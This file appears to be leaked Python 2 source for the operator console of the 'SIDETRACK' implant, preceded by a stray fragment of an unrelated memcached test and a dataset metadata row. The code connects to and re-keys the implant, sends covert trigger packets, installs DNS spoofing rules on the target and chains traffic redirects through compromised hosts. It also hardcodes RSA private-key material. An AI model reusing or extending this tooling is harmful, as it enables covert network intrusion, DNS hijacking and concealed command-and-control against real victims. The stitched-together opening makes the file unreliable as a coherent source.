slave1 = Client(('memcached-slave1', 11211))
assert(slave1.get('a') == b'1')
assert(slave1.get('b') == None)
assert(slave1.get('c') == None)
assert(slave1.get('d') == None)
# Get from the slave2, only string starts with 'b'
slave2 = Client(('memcached-slave2', 11211))
assert(slave2.get('a') == None)
assert(slave2.get('b') == b'2')
assert(slave2.get('c') == None)
assert(slave2.get('d') == None)
# Get from the slave3, only rest of strings
slave3 = Client(('memcached-slave3', 11211))
assert(slave3.get('a') == None)
assert(slave3.get('b') == None)
assert(slave3.get('c') == b'3')
assert(slave3.get('d') == b'4')
| apache-2.0 | -5,473,104,553,618,401,000 | 27.347826 | 60 | 0.663344 | false | 2.728033 | false | true | false |
DarthMaulware/EquationGroupLeaks | Leak #4 - Don't Forget Your Base/EQGRP-Auction-File/Linux/bin/pyside/sidetrack.py | 1 | 72163 | import base
import crypto
import echocmd
import string
import struct
import time
import re
import os
import sys
from socket import *
import rawtcp
import types
class SIDECMD(echocmd.ECHOCMD):
def __init__(self):
echocmd.ECHOCMD.__init__(self)
def TypeConvert(self, stype):
#print "In TypeConvert %d" % (stype)
if type(stype) != type(''):
if stype == 1:
stype = "A"
elif stype == 2:
stype = "NS"
elif stype == 3:
stype = "MD"
elif stype == 4:
stype = "MF"
elif stype == 5:
stype = "CNAME"
elif stype == 6:
stype = "SOA"
elif stype == 7:
stype = "MB"
elif stype == 8:
stype = "MG"
elif stype == 9:
stype = "MR"
elif stype == 10:
stype = "NULL"
elif stype == 11:
stype = "WKS"
elif stype == 12:
stype = "PTR"
elif stype == 13:
stype = "HINFO"
elif stype == 14:
stype = "MINFO"
elif stype == 15:
stype = "MX"
elif stype == 16:
stype = "TXT"
elif stype == 252:
stype = "AXFR"
elif stype == 253:
stype = "MAILB"
elif stype == 254:
stype = "MAILA"
elif stype == 255:
stype = "*"
return stype
def ConvertType(self, rtype):
if type(rtype) != type(0):
rtype = string.upper(rtype)
if rtype == "A":
rtype = 1
elif rtype == "NS":
rtype = 2
elif rtype == "MD":
rtype = 3
elif rtype == "MF":
rtype = 4
elif rtype == "CNAME":
rtype = 5
elif rtype == "SOA":
rtype = 6
elif rtype == "MB":
rtype = 7
elif rtype == "MG":
rtype = 8
elif rtype == "MR":
rtype = 9
elif rtype == "NULL":
rtype = 10
elif rtype == "WKS":
rtype = 11
elif rtype == "PTR":
rtype = 12
elif rtype == "HINFO":
rtype = 13
elif rtype == "MINFO":
rtype = 14
elif rtype == "MX":
rtype = 15
elif rtype == "TXT":
rtype = 16
elif rtype == "AXFR":
rtype = 252
elif rtype == "MAILB":
rtype = 253
elif rtype == "MAILA":
rtype = 254
elif rtype == "*":
rtype = 255
return rtype
def ClassConvert(self, rclass):
#print "In ClassConvert %d" % (rclass)
if type(rclass) != type(''):
if rclass == 1:
rclass = "IN"
elif rclass == 2:
rclass = "CS"
elif rclass == 3:
rclass = "CH"
elif rclass == 4:
rclass = "HS"
return rclass
def ConvertClass(self, rclass):
if type(rclass) != type(0):
rclass = string.upper(rclass)
if rclass == "IN":
rclass = 1
elif rclass == "CS":
rclass = 2
elif rclass == "CH":
rclass = 3
elif rclass == "HS":
rclass = 4
return rclass
def ConvertFlags(self, flags):
# qr rd ra
retFlags = 0
if type(flags) != type(0):
flags = string.upper(flags)
if flags == "RA":
retFlags = retFlags | 0x0080L
if flags == "AA":
retFlags = retFlags | 0x0400L
return retFlags
def SectionConvert(self,section):
if type(section) != type(''):
if section == 0:
section = "query"
elif section == 1:
section = "ans"
elif section == 2:
section = "auth"
elif section == 3:
section = "add"
return section
def ConvertSection(self,section):
if type(section) != type(0):
section = string.upper(section)
if section[:1] == "Q":
section = 0
elif section[:2] == "AN":
section = 1
elif section[:2] == "AU":
section = 2
elif section[:2] == "AD":
section = 3
return section
def NameConvertName(self, name):
ret = ''
sp = 0
if type(name) != type(0):
while name[sp:sp+1] != '\000':
namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0]
#print namelen
if sp != 0:
ret = ret + '.'
for i in range(1,namelen+1):
val = struct.unpack("!H", '\000' + name[sp+i:sp+i+1])[0]
if val >= 32 and val < 127:
ret = ret + name[sp+i:sp+i+1]
else:
raise TypeError, self.HexConvert(name)
sp = sp+1+namelen
return ret
def NameConvert(self, name, padding=0):
try:
return self.NameConvertName(name)
except:
return self.HexConvert(name, padding)
def ConvertName(self, name):
ret = ''
regExpr = re.compile("^[a-zA-Z0-9-_.]*$")
if type(name) != type(0x0L):
reg = regExpr.search(name)
if reg != None:
dots = string.splitfields(name,".")
for i in range(len(dots)):
ret = ret + chr(len(dots[i])) + dots[i]
ret = ret + '\000'
return ret
else:
return name
else:
return struct.pack("!H",name)
def FlagConvert(self, flag):
if flag == 0:
return "Ignore"
elif flag == 1:
return "Count"
elif flag == 2:
return "Active"
def HexConvert(self,data,pad=0):
ret = ''
padding = ''
for i in range(pad):
padding = padding + ' '
for i in range(len(data)):
if i % 16 == 0 and i != 0:
ret = ret + '\n' + padding
myNum = struct.unpack("!H", '\000'+data[i:i+1])[0]
ret = ret + "%02x " % myNum
ret = ret + '\n' + padding + "(%d)" % (len(data))
return ret
class SIDETRACK(base.Implant):
def __init__(self, session, proto):
base.Implant.__init__(self, session, proto)
self.name = 'SIDETRACK'
self.newCV = None
self.targetopts = self.session.target.GetImplantOpts('sidetrack')
self.version = self.targetopts['VERSION']
if self.version >= 2.0:
self.cipher = crypto.rc6()
else:
self.cipher = crypto.rc5()
self.cipher.SetKey(self.targetopts['KEY'])
self.N = 0xdec9ba81a6b9ea70c876ad3413aa7dd57be75d42e668843b1401fd42015144231004bfab4e459dabdbb159665b48a4d72357c3630d0e911b5b96bf0b0d8ab83f4bb045a13ea2acc85d120c3539f206200b9931a41ad6141eb7212e66784880ff6f32b16e1783d4ca52fe5ec484ef94f019feaf58abbc5de6a62f10eec347ac4dL
self.d = 0x25219f159bc9a712cc13c788adf1bfa394a68f8b2666c0b48355aa35aae2e0b082ab754737b644f1f9f2e43bb9e170ce85e3f5e5d7826d848f43ca81d7971eb4e7a62bc8e5e0a549bcb9ecb216451f8ba32444a71cb0ff97a77500cb39f802968ae7c10366d3eed895b939ec54eb8c4c54329bddb0eb00e691bc6b5d10d5af05L
self.Nsign = 0xb2003aac88a36d45d840bc748aa972b3f2e69a29f43f1e2faf810d9172db756d4843492489781764688d29c3a547a1522702d20e10f426149ac2f323bf35dfa1cb036f467109fd321bae03711eab16b210ed131ac077113f1dd34be480508708893c1a40fdc1b1d637e1cf3efd13e6bbbdc88a8c2fc103a45c490ba933a79a31L
self.dsign = 0x076aad1c85b179e2e902b284db1c64c77f74466c6a2d4beca7500b3b64c924e48dad786185ba564ed9b08c6826e2fc0e16f5736b40b4d6eb8672ca217d4ce95156a1920e3e48fe1dfe82738bb6ec985c441421d188962b141d3113773e8006b1273de6b846635ff7979547b516d7c426d5c3b0e2505150095b81e266e3b97c03L
self.packetSize = 450
self.timediff = self.session.target.timediff
self.localRedir = None
self.parent = None
self.children = []
self.rules = []
def RegisterCommands(self):
self.AddCommand('ping', echocmd.ECHOCMD_PING)
self.AddCommand('status', echocmd.ECHOCMD_STATUS)
self.AddCommand('done', echocmd.ECHOCMD_DONE)
self.AddCommand('setsize', echocmd.ECHOCMD_SETSIZE)
self.AddCommand('timediff', echocmd.ECHOCMD_TIMEDIFF)
self.AddCommand('incision', echocmd.ECHOCMD_INCISION)
self.AddCommand('rekey', echocmd.ECHOCMD_REKEY)
self.AddCommand('switchkey', echocmd.ECHOCMD_SWITCHKEY)
self.AddCommand('origkey', echocmd.ECHOCMD_ORIGKEY)
self.AddCommand('key', echocmd.ECHOCMD_KEY)
self.AddCommand('init', SIDECMD_INIT)
self.AddCommand('dnsadd', SIDECMD_DNSADD)
self.AddCommand('dnsrm', SIDECMD_DNSREMOVE)
self.AddCommand('dnsset', SIDECMD_DNSSET)
self.AddCommand('dnsaction', SIDECMD_DNSACTION)
self.AddCommand('dnsraw', SIDECMD_DNSRAW)
self.AddCommand('dnslist', SIDECMD_DNSLIST)
self.AddCommand('dnsload', SIDECMD_DNSLOAD)
self.AddCommand('dnssave', SIDECMD_DNSSAVE)
self.AddCommand('rediradd', SIDECMD_REDIRADD)
self.AddCommand('redirlist', SIDECMD_REDIRLIST)
self.AddCommand('redirset', SIDECMD_REDIRSET)
self.AddCommand('redirrm', SIDECMD_REDIRREMOVE)
self.AddCommand('connlist', SIDECMD_CONNLIST)
self.AddCommand('connrm', SIDECMD_CONNREMOVE)
self.AddCommand('stunload', SIDECMD_UNLOAD)
self.AddCommand('connect', SIDECMD_CONNECT)
self.AddCommand('cclist', SIDECMD_CCLIST)
self.AddCommand('ccremove', SIDECMD_CCREMOVE)
self.AddCommand('multiaddr', SIDECMD_MULTIADDR)
##########################################################################
# HASANOTHERADDRESS class
#########################################################################
class SIDECMD_MULTIADDR(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "multiaddr"
self.usage = "multiaddr <0|1>"
self.info = "Let pyside know that the target has multiple addresses"
def run(self, value=1):
self.implant.session.target.hasAnotherAddress = value
return (1, "Value updated")
##########################################################################
# CONNECT class
#########################################################################
class SIDECMD_CONNECT(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "connect"
self.usage = "connect <listen_address>:<listen_port>/<callback_port> <trigger_port>"
self.info = "Connect to SIDETRACK"
def parseHostInfo(self,host):
#split the ip from the ports
res = string.split(host,":")
if len(res) == 1:
raise ValueError, host
elif len(res) == 2:
ports = string.split(res[1],"/")
if len(ports) != 2:
raise ValueError, host
if ports[0] == "*":
raise ValueError, ports[0]
else:
ports[0] = eval(ports[0])
if ports[1] == "*":
raise ValueError, ports[1]
else:
ports[1] = eval(ports[1])
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
# host references a session
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,ports[0],ports[1]
else:
raise ValueError, host
def run(self,hostinfo,fport):
# Parse the ports
prevRule = None
tempRule = None
localRedir = None
host,laddr,lport,cbport = self.parseHostInfo(hostinfo)
if fport == 0:
PORT = 500
#open the listener
try:
sock = socket(AF_INET,SOCK_STREAM,0)
sock.bind(('',lport))
sock.listen(2)
except error, message:
return (0, "Could not open port %d %s" % (lport,message))
# See if the user entered another host
if host != None:
self.implant.parent = host
#hpn is the hop prior to host (might just be "me")
hpn = host.implant.parent.name
myname = host.name
hostinfo = re.sub(myname,hpn,hostinfo)
# Testing
localRedir = REDIRECT(self,0,10800,10800,6,\
self.ConvertIP(self.implant.session.target.ip), \
self.ConvertIP(self.implant.session.target.ip),
0,0,0,(0,0,0,0),0,0x201,lport,cbport,0,0)
localRedir.add(0)
self.implant.session.localRedir = localRedir
# Add a redirect (on the previous host) for this connection
cmd = host.GetCommand('rediradd')
base.ccSupport = 1
res = cmd.run("tcp",hostinfo,"%s:%d/%d"%(self.implant.session.target.ip,cbport,lport),"-tfix", "-afix","-l","3h","-c","3h")
base.ccSupport = 0
if res[0] == 0:
return res
# Let the previous implant know this redirect rule is in support
# of a command and control connection
prevRule = cmd.redir
if prevRule != None:
prevRule.ccPassthru = self.implant.session
# Add a temporary rule to allow the trigger to be passed to target
base.ccSupport = 1
if fport == 0:
res = cmd.run("udp","%s:%d/%d"%(hpn,PORT,PORT),"%s:%d/%d"%(self.implant.session.target.ip,PORT,PORT),"-tfix", "-afix")
else:
res = cmd.run("tcp","%s:%d/%d"%(hpn,0,fport),"%s:%d/%d"%(self.implant.session.target.ip,fport,0),"-tfix")
base.ccSupport = 0
base.db(2,"%d.%d.%d.%d"%(res[2] >> 24, (res[2] >> 16) & 0xff, (res[2] >> 8) & 0xff, res[2] & 0xff))
if res[0] == 0:
if prevRule != None:
prevRule.remove()
return (0, "Unable to establish redir for port %d: %s"%(fport,res[1]))
tempRule = cmd.redir
else:
localRedir = None
prevRule = None
self.implant.session.localRedir = None
#add the rule
if tempRule == None or (tempRule != None and \
cmd.implant.session.target.hasAnotherAddress == 0):
rule = base.redir.listen(laddr,\
self.ConvertIP(self.implant.session.target.ip),\
fport,lport,cbport,\
self.implant.timediff, \
self.implant.cipher.GetKey())
else:
rule = base.redir.listen(tempRule.ST_ip,\
self.ConvertIP(self.implant.session.target.ip),\
fport,lport,cbport,\
self.implant.timediff, \
self.implant.cipher.GetKey())
#Make the connection
if fport == 0:
conn = socket(AF_INET,SOCK_DGRAM,0)
conn.bind(('',PORT))
conn.connect((self.implant.session.target.ip,PORT))
f = os.popen("dd if=/dev/urandom bs=128 count=3 2>/dev/null")
d = f.read()
f = None
data = d[0:14] + struct.pack("HBBBB", 0, 0x08, 0x10, 0x20, 0x01) + \
d[16:20] + struct.pack("!L", 0x154) + d[20:332]
conn.send(data)
conn.close()
#accept
self.implant.protocol.sock,addr = sock.accept()
else:
#conn = socket(AF_INET,SOCK_STREAM,0)
# STUB: Catch this in a try statement
try:
# esev - 6/24/03
#conn.connect((self.implant.session.target.ip,fport))
#conn.close()
#conn = None
rawtcp.sendFakeConnection(self.implant.session.target.ip,fport)
# STUB: Put a timeout here
#accept
self.implant.protocol.sock,addr = sock.accept()
except:
base.redir.delete(rule)
sock.close()
sock = None
#if conn != None:
# conn.close()
if localRedir != None:
localRedir.remove()
if prevRule != None:
prevRule.remove()
if tempRule != None:
tempRule.remove()
base.sessionDict[self.implant.session.name] = None
return (1,"Canceled by user, target %s removed" % self.implant.session.name)
sock.close()
sock = None
# Set the CC redirect to inactive. This will not effect the
# current connection..only prevent the rule from getting in the way
if prevRule != None:
prevRule.set(0)
#if there is a connection back return 1 else 0
if self.implant.protocol.sock:
cmd = self.implant.session.GetCommand("init")
res = cmd.run()
# remove the temporary redirect
if tempRule != None:
tempRule.remove()
# remove the connection rule
base.redir.delete(rule)
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
return (1, "Connected")
else:
# remove the temporary redirect
if tempRule != None:
tempRule.remove()
# remove the connection rule
base.redir.delete(rule)
return (0, "Could not connect")
##########################################################################
# INIT class
# op code: 0x20
#########################################################################
class SIDECMD_INIT(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "init"
self.usage = "init"
self.info = "Initialize the implant"
def run(self):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
cmd = self.implant.session.GetCommand("ping")
res = cmd.run()
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
for i in range(3):
cmd = self.implant.session.GetCommand("rekey")
res = cmd.run()
if res[0] != 0:
break
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
cmd = self.implant.session.GetCommand("switchkey")
res = cmd.run()
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
cmd = self.implant.session.GetCommand("status")
res = cmd.run()
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
return (1,"Initialization complete")
##########################################################################
# DNSREAD class
#########################################################################
class SIDECMD_DNSLOAD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsload"
self.usage = "dnsload <filename>"
self.info = "Send DNS data from a file to the target"
#-------------------------------------------------------------------------
# Name : ProcessArg
# Purpose: Tests to see if the argument is a string or number
# Receive: arg - The argument to test
# Return : The original string if a number, or a quoted string if not
#-------------------------------------------------------------------------
def ProcessArg(self,arg):
if (re.match('^-?[0-9]*(\.[0-9]+)?$',arg) != None or \
re.match('^0x[0-9a-fA-F]+L?', arg) != None):
return arg
else:
return '"' + arg + '"'
def runRule(self, args):
cmd = SIDECMD_DNSADD()
cmd.implant = self.implant
argString = 'myRes = cmd.run('
for i in range(1,len(args)):
if i == 1:
argString = argString + self.ProcessArg(args[i])
else:
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
if myRes and myRes[0]:
self.lastRule = myRes[0]
def runSet(self, args):
cmd = SIDECMD_DNSSET()
cmd.implant = self.implant
argString = 'myRes = cmd.run(self.lastRule'
for i in range(1,len(args)):
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
def runCmd(self, args):
cmd = SIDECMD_DNSACTION()
cmd.implant = self.implant
argString = 'tmp = cmd.run(self.lastRule'
for i in range(len(args)):
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
def run(self, filename):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
file = open(filename,'r')
self.lastRule = 0
while 1:
line = file.readline()
if not line:
line = None
return (1, "Input from file complete")
args = base.SplitCommandString(string.strip(line))
if len(args) == 0:
continue
elif args[0][0:1] == '#' or args[0] == '':
continue
elif args[0] == "rule":
self.runRule(args)
print "Rule %d added\n" % (self.lastRule)
elif args[0] == "set":
self.runSet(args)
else:
self.runCmd(args)
return (0, "problem")
##########################################################################
# DNSADD class
# op code: 0x18
#########################################################################
class SIDECMD_DNSADD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsadd"
self.usage = "dnsadd <from ip> <from mask> <longevity> <type> <class> <name> [dns flags]"
self.info = "Add a DNS entry into sidetrack (see also dnsset)"
self.op = 0x18L
def run(self,ip,mask,length,rtype,rclass,name,flags=0x0080L):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
ipStr = self.ConvertIP(ip)
maskStr = self.ConvertIP(mask)
rtype = self.ConvertType(rtype)
rclass = self.ConvertClass(rclass)
name = self.ConvertName(name)
length = self.ConvertTime(length)
self.data = ipStr + maskStr + struct.pack("!LHHHH",length,flags,\
rtype,rclass,len(name)) +name
self.Query()
if( self.op == 0x18L and self.res == 0x1L ):
dnsRes = struct.unpack("!l",self.data[0:4])[0]
return (dnsRes, "Add successful, rule number: %d" % dnsRes)
else:
return (0, "Add failed")
##########################################################################
# DNSREMOVE class
# op code: 0x19
#########################################################################
class SIDECMD_DNSREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsrm"
self.usage = "dnsrm <rule|all>"
self.info = "Remove a dns rule"
self.op = 0x19L
def run(self,rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
self.data = struct.pack("!l",rule)
self.Query()
if self.op == 0x19L and self.res == 0x01L:
return (1,"Rule(s) removed")
else:
return (0,"unable to remove rule(s)")
##########################################################################
# DNSSET class
# op code: 0x20
#########################################################################
class SIDECMD_DNSSET(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsset"
self.usage = "dnsset <rule> <ignore|count|active>"
self.info = "Turn a DNS rule on or off"
self.op = 0x20L
def run(self,rule,onoff):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
self.data = struct.pack("!l",rule)
if onoff[0:1] == "a" or onoff[0:1] == "A":
self.data = self.data + struct.pack("!h", 2)
elif onoff[0:1] == "c" or onoff[0:1] == "C":
self.data = self.data + struct.pack("!h", 1)
else:
self.data = self.data + struct.pack("!h", 0)
self.Query()
if self.op == 0x20L and self.res == 0x01L:
return (1,"rule %d successfully set to %s" %\
(rule, onoff))
else:
return (0,"unable to set rule to %s" % onoff)
##########################################################################
# DNSRAW class
# op code: 0x21
#########################################################################
class SIDECMD_DNSRAW(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsraw"
self.info = "Upload a binary dns response packet"
self.usage = "dnsraw <rule> <filename>"
self.op = 0x21L
def run(self, rule, filename):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0, msg)
file = open(filename,'r')
file.seek(0,2)
filesize = file.tell()
file.seek(0,0)
maxchunksize = self.implant.packetSize - 34
numchunks = filesize / maxchunksize
if filesize%maxchunksize > 0:
numchunks = numchunks + 1
for i in range(numchunks):
self.data = file.read(maxchunksize)
self.data = struct.pack("!LHHHH",rule,i,numchunks,4,\
len(self.data)) + self.data
self.Query()
if (self.op != 0x21L or self.res != 0x1L):
return (0,"Binary upload failed at chunk %d"%(i+1))
return (1,"Binary upload of %d chunks successful"%(numchunks))
##########################################################################
# DNSACTION class
# op code: 0x21
#########################################################################
class SIDECMD_DNSACTION(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsaction"
self.info = "Set the action for a rule"
self.usage = "dnsaction <rule> <ans|auth|add> <name> <type> <class> <ttl> <data>"
self.op = 0x21L
def run(self,rule,sect,name,rtype,rclass,ttl,data):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
name = self.ConvertName(name)
sect = self.ConvertSection(sect)
rtype = self.ConvertType(rtype)
rclass = self.ConvertClass(rclass)
ttl = self.ConvertTime(ttl)
if rtype == 1:
data = self.ConvertIP(data)
else:
data = self.ConvertName(data)
self.data = struct.pack("!LLHHHHH", rule, ttl, sect, rtype,\
rclass,\
len(name),\
len(data))+\
name+data
self.Query()
if self.op == 0x21L and self.res == 0x01L:
return (1,"%s action for rule %d set successfully" % \
(sect, rule))
else:
return (0,"Could not set action")
##########################################################################
# DNSLIST class
# op code: 0x22
#########################################################################
class SIDECMD_DNSLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnslist"
self.usage = "dnslist [-v] [rule] [section]"
self.info = "Retrieve a section of a rule from SIDETRACK"
self.op = 0x22L
def ParseReturn(self):
if self.implant.version < 2.0:
self.lastport = 0
(self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\
self.lastIP, self.lastTime, self.seen, self.flag, self.ttl, \
self.dnsflags, self.rtype, self.rclass, self.rsec, \
self.nlen, self.dlen) =\
struct.unpack("!lLLLLLLHHLHHHHHH", self.data[0:48])
self.dnsname = self.data[48:48+(self.nlen)]
self.dnsdata = self.data[48+(self.nlen):48+(self.nlen)+(self.dlen)]
else:
(self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\
self.lastIP, self.lastTime, self.seen, self.flag, self.lastport, \
self.dnsflags, self.ttl, self.rtype, self.rclass, self.rsec, \
self.nlen, self.dlen) =\
struct.unpack("!lLLLLLLHHHHLHHHHH", self.data[0:50])
self.dnsname = self.data[50:50+(self.nlen)]
self.dnsdata = self.data[50+(self.nlen):50+(self.nlen)+(self.dlen)]
def GetRuleString(self):
printOut = "%10d %s/%s %-7s %s\n" % \
(self.rule,
self.ConvertToDot(self.fromIP),
self.ConvertToDot(self.fromMask),
self.FlagConvert(self.flag),
time.ctime(self.longevity+self.implant.timediff)[4:])
printOut = printOut + " %5s: %-5d %s:%d %s\n" %\
("count",
self.seen,
self.ConvertToDot(self.lastIP),
self.lastport,
time.ctime(self.lastTime + self.implant.timediff))
return printOut + self.GetSectionString()
def GetRule(self,rule,sec=0):
sec = self.ConvertSection(sec)
#print "Getting section %d of rule %d\n" % (sec,rule)
self.data = struct.pack("!LLH",rule,0,sec)
self.Query()
if self.op == 0x22L and self.res == 0x01L:
self.ParseReturn()
printOut = self.GetRuleString()
return (1, printOut)
else:
return (0,"Error receiving result\n")
def GetNextRule(self,lastRule,sec=0):
sec = self.ConvertSection(sec)
print "Getting section %d of rule after %d\n" % (sec,lastRule)
self.data = struct.pack("!LLH",0,lastRule,sec)
self.Query()
if self.op == 0x22L and self.res == 0x01L:
self.ParseReturn()
if self.retVal == 0:
lastRule = self.rule
elif self.retVal == 2:
lastRule = -2
else:
lastRule = -1
if lastRule == -2:
lastRule = -1
printOut = 'There are currently no rules'
else:
printOut = self.GetRuleString()
return (lastRule, printOut)
elif lastRule == 0:
print self.res
return (0,"There are currently no rules!")
else:
return (0,"Error receiving result\n")
def GetSectionString(self):
printOut = " %5s: %-5s %-3s %-5d " % \
(self.SectionConvert(self.rsec),
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.ttl&0xffffffL)
if self.nlen:
try:
printOut = printOut + "%s\n" % \
(self.NameConvertName(self.dnsname))
except:
printOut = printOut + "\n N: %s\n" %\
(self.HexConvert(self.dnsname,10))
if self.dlen:
if self.rtype == 1 and self.dlen == 4:
printOut = printOut + \
" D: %s\n" % \
(self.ConvertToDot(self.dnsdata))
else:
printOut = printOut + \
" D: %s\n" %\
(self.NameConvert(self.dnsdata,10))
return printOut
def GetSection(self,rule,section):
print "Getting section %d of rule %d\n" % (section,rule)
self.data = struct.pack("!LLH",rule,0,section)
self.Query()
if self.op == 0x22L and self.res == 0x01L:
self.ParseReturn()
if self.rsec == 4:
return (1, '')
return (1,self.GetSectionString())
else:
return (0, "Could not get section")
def preRuleString(self):
return "-----------------------------------------------------------------------\n"
def postRuleString(self):
return ''
def runAll(self):
moreRules = 1
lastRule = 0
printOut = ''
while moreRules:
res = self.GetNextRule(lastRule)
if res[0] == 0:
return res
elif res[0] == -1:
moreRules = 0
lastRule = self.rule
else:
lastRule = res[0]
printOut = printOut + self.preRuleString()
printOut = printOut + res[1]
for i in range(1,4):
sec = self.GetSection(lastRule, i)
if sec[0] == 0:
return (0, printOut)
printOut = printOut + sec[1]
printOut = printOut + self.postRuleString()
return (1, printOut)
def run(self,rule=-1, sec=-1, ext=-1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if rule == -1:
lastRule = 0
moreRules = 1
printOut = ''
while moreRules:
res = self.GetNextRule(lastRule)
if res[0] == 0:
return res
elif res[0] == -1:
moreRules = 0
lastRule = self.rule
else:
lastRule = res[0]
printOut = printOut + res[1]
elif rule == "-v":
if sec == -1:
return self.runAll()
else:
if ext == -1:
res = self.GetRule(sec)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(sec, i)
if sd[0] == 0:
return (0, printOut)
printOut = printOut + sd[1]
else:
return self.GetRule(sec,ext)
else:
if sec == -1:
return self.GetRule(rule)
else: # Rule != 0 and sec != -1
return self.GetRule(rule,sec)
return (1,printOut)
##########################################################################
# DNSREAD class
#########################################################################
class SIDECMD_DNSSAVE(SIDECMD_DNSLIST):
def __init__(self):
SIDECMD_DNSLIST.__init__(self)
self.name = "dnssave"
self.usage = "dnssave [rule] [filename]"
self.info = "Save one of more rules"
def ToOct(self, data):
if type(data) == type(0x0L) or type(data) == type(0):
ret = ''
if data > 255:
if data > 65535:
if data > 16777215:
ret = ret + "\\%o" % ((int)(data/16777216)&0xffL)
ret = ret + "\\%o" % ((int)(data/65536)&0xffL)
ret = ret + "\\%o" % ((int)(data/256)&0xffL)
ret = ret + "\\%o" % (data & 0xffL)
else:
reg = regex.compile("^[a-zA-Z0-9-_.]*$")
ret = ''
for i in range(len(data)):
if reg.match(data[i:i+1]) != None:
ret = ret + data[i:i+1]
else:
ret = ret + "\\%o" % \
struct.unpack("!H",'\000'+data[i:i+1])[0]
return '"' + ret + '"'
def NameConvertName(self, name):
reg = regex.compile("^[a-zA-Z0-9-_.]*$")
ret = ''
sp = 0
if type(name) != type(0):
while name[sp:sp+1] != '\000':
namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0]
#print namelen
if sp != 0:
ret = ret + '.'
for i in range(1,namelen+1):
if reg.match(name[sp+i:sp+i+1]) != None:
ret = ret + name[sp+i:sp+i+1]
else:
raise TypeError, self.ToOct(name)
sp = sp+1+namelen
return ret
def NameConvert(self, name, padding=0):
try:
return self.NameConvertName(name)
except:
return self.ToOct(name)
def GetSectionString(self):
printOut = "%s %s %s %s %d " % \
(self.SectionConvert(self.rsec),
self.NameConvert(self.dnsname),
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.ttl&0xffffffL)
if self.dlen:
if self.rtype == 1 and self.dlen == 4:
printOut = printOut + self.ConvertToDot(self.dnsdata)
else:
printOut = printOut + self.NameConvert(self.dnsdata,10)
return printOut + '\n'
def GetRuleString(self):
printOut = "rule %s %s %d %s %s %s 0x%04x\n" % \
(self.ConvertToDot(self.fromIP),
self.ConvertToDot(self.fromMask),
self.longevity - self.rule,
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.NameConvert(self.dnsname),
self.dnsflags)
return printOut
def preRuleString(self):
return "# -----------------------------------------------------------------------\n"
def postRuleString(self):
return "set %s\n" % (self.FlagConvert(self.flag))
def run(self,rule=-1, file=-1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if rule == -1: # All Rules to stdout
return self.runAll()
elif type(rule) == type(''): # All rules to file
out = open(rule,'w')
res = self.runAll()
if res[0] == 0:
return res
out.write(res[1])
out = None
return res
elif file == -1: # Single rule to stdout
res = self.GetRule(rule)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(rule,i)
if sd[0] == 0:
return (0,printOut + sd[1])
printOut = printOut + sd[1]
return (1,printOut + self.postRuleString())
else: # Single rule to file
out = open(file,"w")
res = self.GetRule(rule)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(rule,i)
if sd[0] == 0:
return (0,printOut + sd[1])
printOut = printOut + sd[1]
printOut = printOut + self.postRuleString()
out.write(printOut)
out = None
return (1,printOut)
#############################################################################
# REDIRADD class
# opcode 0x23
#############################################################################
class SIDECMD_REDIRADD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "rediradd"
self.usage = "rediradd <protocol | all> <host_A> <host_B> [-insert <rule>]\n [-ttl (reset | <num>)] [-nocrypto] [-afix] [-tfix] [-samesum]\n [-longevity <time>] [-conntimeout <time>]\n\n <host_A>/<host_B> format: <ip_address>[:<local_port>/<remote_port>]\n"
self.info = "Add a REDIRECT rule into SIDETRACK's rule set"
self.op = 0x23L
def parseProto(self,proto):
origproto = proto
if type(proto) == type ('a'):
proto = string.upper(proto)[:1]
if proto == "T":
proto = 6
elif proto == "U":
proto = 17
elif proto == "I":
proto = 1
elif proto == "A":
proto = 0
else:
raise ValueError, origproto
return proto
def parseHostInfo(self,host):
#split the ip from the ports
res = string.split(host,":")
